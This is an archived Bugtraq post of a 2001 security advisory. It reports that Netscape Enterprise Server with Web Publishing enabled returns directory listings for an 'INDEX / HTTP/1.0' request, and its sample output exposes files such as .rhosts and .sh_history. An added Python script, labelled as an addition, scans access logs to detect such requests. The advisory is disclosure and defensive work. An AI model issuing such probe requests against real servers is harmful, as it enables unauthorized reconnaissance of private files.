5998395 2001-01-24 22:41 +0700  /80 lines/ Security Research Team <security@RELAYGROUP.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-01-24  20:17  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: security@RELAYGROUP.COM
Recipient: Bugtraq (import) <14992>
Subject: [SAFER] Security Bulletin 010124.EXP.1.11
------------------------------------------------------------
From: Security Research Team <security@RELAYGROUP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010124224124.B15898@relaygroup.com>

__________________________________________________________

      S.A.F.E.R. Security Bulletin 010124.EXP.1.11
__________________________________________________________


TITLE    : Netscape Enterprise Server - INDEX request problem
DATE     : January 24, 2001
NATURE   : Information gathering
AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled

PROBLEM:

A problem exists that allows a remote user to obtain directory listings
on a remote site running Web Publishing.

DETAILS:

It is possible to obtain a directory listing on the remote web server
by issuing the command:

INDEX / HTTP/1.0

Output looks like:

-- output start --

Trying 192.168.1.1...
Connected to www.example.org.
Escape character is '^]'.
INDEX / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain

test directory 512 979859452 0 null null
contact directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
service directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
.profile unknown 416 975657629 264 null null

-- output end --

The INDEX request will not work on 'aliased' directories (like CGI
directories and similar).

FIXES:

Netscape has been contacted on multiple occasions, the first time more
than a year ago. Although other problems we have reported have been
fixed, we have received no response on this issue to date.

The workaround is to disable Web Publishing, or to disable the INDEX
request (which will, most likely, break the web publishing feature).
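
To check whether the INDEX request described above has been made against a
server, the following added example (not part of the original advisory) scans
an access log for requests whose method is INDEX and reports which ones
returned a listing. It assumes the server logs in Common Log Format; the log
lines, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access log in Common Log Format (not from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jan/2001:12:37:26 +0000] "INDEX / HTTP/1.0" 200 612
192.0.2.10 - - [19/Jan/2001:12:37:41 +0000] "INDEX /corporate/ HTTP/1.0" 200 344
198.51.100.7 - - [19/Jan/2001:12:40:02 +0000] "GET /index.html HTTP/1.0" 200 1467
203.0.113.5 - - [19/Jan/2001:12:41:15 +0000] "INDEX /cgi-bin/ HTTP/1.0" 404 207
203.0.113.5 - - [19/Jan/2001:12:41:16 +0000] "index / HTTP/1.0" 501 190
198.51.100.7 - - [19/Jan/2001:12:42:00 +0000] "GET /INDEX HTTP/1.0" 404 207
not a log line
"""

# Assumption: Common Log Format with a quoted request line.
CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def find_index_requests(log_text):
    """Return (hits, unparsed); hits maps client -> list of INDEX requests."""
    hits = defaultdict(list)
    unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = CLF.match(line)
        if not m:
            unparsed += 1  # count lines we could not inspect
            continue
        # Compare the method token only, so "GET /INDEX" is not flagged.
        # Case variants are flagged as well, even if the server rejects them.
        if m.group("method").upper() != "INDEX":
            continue
        status = int(m.group("status"))
        hits[m.group("client")].append({
            "time": m.group("time"),
            "path": m.group("path"),
            "status": status,
            "listed": 200 <= status < 300,  # server answered with a listing
        })
    return dict(hits), unparsed

def exposed_paths(hits):
    """Sorted unique paths for which an INDEX request succeeded."""
    return sorted({h["path"] for reqs in hits.values() for h in reqs if h["listed"]})
```

Any path returned by exposed_paths() has had its directory listing served to
a client, so its contents should be reviewed for files that were never meant
to be published.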

CREDITS:

Emmanuel Gadaix <emmanuel@relaygroup.com>
Vanja Hrustic <vanja@relaygroup.com>
Fyodor Yarochkin <fyodor@relaygroup.com>


This advisory is also available at http://www.safermag.com/advisories/

__________________________________________________________

   S.A.F.E.R. - Security Alert For Enterprise Resources
          Copyright (c) 2001 The Relay Group
  http://www.safermag.com  ----  security@relaygroup.com
__________________________________________________________
(5998395) --------------------------------(Rewrapped)